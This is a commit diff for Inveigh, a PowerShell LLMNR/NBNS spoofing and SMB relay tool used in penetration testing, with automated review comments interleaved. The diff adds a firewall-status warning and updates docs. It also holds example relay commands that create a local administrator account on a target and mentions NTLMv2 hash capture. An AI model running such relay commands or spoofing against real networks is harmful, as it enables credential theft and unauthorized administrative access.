| -rw-r--r-- | README.md | 7 | ||||
| -rw-r--r-- | Scripts/Inveigh-BruteForce.ps1 | 13 | ||||
| -rw-r--r-- | Scripts/Inveigh-Relay.ps1 | 15 | ||||
| -rw-r--r-- | Scripts/Inveigh.ps1 | 16 | 
4 files changed, 47 insertions, 4 deletions
@@ -73,7 +73,7 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design  * __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire   ### Invoke-InveighBruteForce -* The remote (Hot Potato method)/unprivileged NBNS brute force spoofer function. This function can be used to perform NBNS spoofing across subnets and/or perform NBNS spoofing without an elevated administrator or SYSTEM shell.  +* The remote (Hot Potato method)/unprivileged NBNS brute force spoofer function. This function can be used to perform NBNS spoofing across subnets and/or perform NBNS spoofing without an elevated administrator or SYSTEM shell.  ##### Privilege Requirements:  * Regular User @@ -84,6 +84,9 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design  * Granular control of console and file output    * Run time control   +##### Notes: +* Microsoft released patches in June 2016 that will likely prevent some of this function's features from working.   +  ##### Parameters:  * __SpooferIP__ - Specify an IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh Brute Force host.     * __SpooferTarget__ - Specify an IP address to target for brute force NBNS spoofing.    @@ -156,7 +159,7 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design  * __Get-InveighNTLMv2__ - Get all or unique (-unique) captured NTLMv2 challenge/response hashes    * __Watch-Inveigh__ - Enable real time console output    * __Clear-Inveigh__ - Clear Inveigh data from memory   -* __Stop-Inveigh__ - Stop all running Inveigh functions  +* __Stop-Inveigh__ - Stop all running Inveigh functions    ## Miscellaneous Notes  * The local LLMNR/NBNS services do not need to be disabled on the host system.    
diff --git a/Scripts/Inveigh-BruteForce.ps1 b/Scripts/Inveigh-BruteForce.ps1
index 5bdc181..2fa6cfd 100644
--- a/Scripts/Inveigh-BruteForce.ps1
+++ b/Scripts/Inveigh-BruteForce.ps1
@@ -285,6 +285,13 @@ else
 $inveigh.status_queue.Add("Inveigh Brute Force started at $(Get-Date -format 's')") > $null
 $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Brute Force started")])  > $null
+$firewall_status = netsh advfirewall show allprofiles state | where {$_ -match 'ON'}
+
+if($firewall_status)
+{
+    $inveigh.status_queue.Add("Windows Firewall = Enabled")  > $null
+}
+
 if($NBNS -eq 'Y')
 {         $inveigh.status_queue.Add("NBNS Brute Force Spoofer Target = $SpooferTarget") > $null
@@ -445,6 +452,12 @@ if($inveigh.status_output)
                     $inveigh.status_queue.RemoveRange(0,1)
                 }
+                "Windows Firewall = Enabled"
+                {
+                    Write-Warning($inveigh.status_queue[0])
+                    $inveigh.status_queue.RemoveRange(0,1)
+                }
+
                 default
                 {
                     Write-Output($inveigh.status_queue[0])
diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1
index 70551b2..f8ce03e 100644
--- a/Scripts/Inveigh-Relay.ps1
+++ b/Scripts/Inveigh-Relay.ps1
@@ -87,7 +87,7 @@ Default = 0: (0,1,2) Enable/Disable features for better operation through extern
 Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire    .EXAMPLE
-Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Spring2016 /add && net localgroup administrators Dave /add"
+Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2016 /add && net localgroup administrators Dave /add"
 Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay
 target. 
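Review bot: The check `netsh advfirewall show allprofiles state | where {$_ -match 'ON'}` in this hunk is a loose text match: `-match` is case-insensitive and unanchored, and netsh output follows the system display language, so on a non-English host the warning can be silently skipped or triggered by an unrelated line. It also reports `Windows Firewall = Enabled` when any one of the profiles is on, whether or not that is the active profile. A tighter pattern such as `where {$_ -cmatch '\bON\s*$'}` plus a comment stating the any-profile semantics would make the result easier to trust; the check also launches netsh.exe as a child process on every start, which is worth noting in the function help since it shows up in process-creation logging. The same lines are added in Scripts/Inveigh-Relay.ps1 (@@ -234,6 +234,13 @@) and Scripts/Inveigh.ps1 (@@ -478,6 +478,14 @@), and the enclosing `else` block starts outside the hunk.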
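Review bot: The new case label `"Windows Firewall = Enabled"` has to stay identical to the string queued by `$inveigh.status_queue.Add("Windows Firewall = Enabled")` in the earlier hunk, so a later edit to either one would let the message fall through to `default` and be printed with Write-Output instead of Write-Warning. Holding the text in one variable used at both sites would remove that coupling; at minimum a comment such as `# must match the firewall status message queued at startup` belongs above the case. The same case is added in Scripts/Inveigh-Relay.ps1 (@@ -402,6 +409,12 @@) and Scripts/Inveigh.ps1 (@@ -785,6 +793,12 @@). What appears to be the surrounding switch begins and ends outside the hunk, so its selector is not visible here.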
@@ -234,6 +234,13 @@ if(!$inveigh.running)
     $inveigh.status_queue.Add("Inveigh Relay started at $(Get-Date -format 's')") > $null
     $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay started")]) > $null
+    $firewall_status = netsh advfirewall show allprofiles state | where {$_ -match 'ON'}
+
+    if($firewall_status)
+    {
+        $inveigh.status_queue.Add("Windows Firewall = Enabled")  > $null
+    }
+
     if($HTTP -eq 'Y')
     {
         $inveigh.HTTP = $true
@@ -402,6 +409,12 @@ if($inveigh.status_output)
                     $inveigh.status_queue.RemoveRange(0,1)
                 }
+                "Windows Firewall = Enabled"
+                {
+                    Write-Warning($inveigh.status_queue[0])
+                    $inveigh.status_queue.RemoveRange(0,1)
+                }
+
                 default
                 {
                     Write-Output($inveigh.status_queue[0])
diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1
index da0cf55..1e5ea3f 100644
--- a/Scripts/Inveigh.ps1
+++ b/Scripts/Inveigh.ps1
@@ -223,7 +223,7 @@ Invoke-Inveigh -HTTPResponse "<html><head><meta http-equiv='refresh' content='0;
 Execute specifying an HTTP redirect response.
 .EXAMPLE
-Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Spring2016 /add && net localgroup administrators Dave /add"
+Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2016 /add && net localgroup administrators Dave /add"
 Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay
 target.   
@@ -478,6 +478,14 @@ else
 # Write startup messages
 $inveigh.status_queue.Add("Inveigh started at $(Get-Date -format 's')")  > $null
 $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh started")]) > $null
+
+$firewall_status = netsh advfirewall show allprofiles state | where {$_ -match 'ON'}
+
+if($firewall_status)
+{
+    $inveigh.status_queue.Add("Windows Firewall = Enabled")  > $null
+}
+
 $inveigh.status_queue.Add("Listening IP Address = $IP")  > $null
 $inveigh.status_queue.Add("LLMNR/NBNS Spoofer IP Address = $SpooferIP")  > $null
@@ -785,6 +793,12 @@ if($SMBRelay -eq 'N')
                         $inveigh.status_queue.RemoveRange(0,1)
                     }
+                    "Windows Firewall = Enabled"
+                    {
+                        Write-Warning($inveigh.status_queue[0])
+                        $inveigh.status_queue.RemoveRange(0,1)
+                    }
+
                     default
                     {
                         Write-Output($inveigh.status_queue[0])  |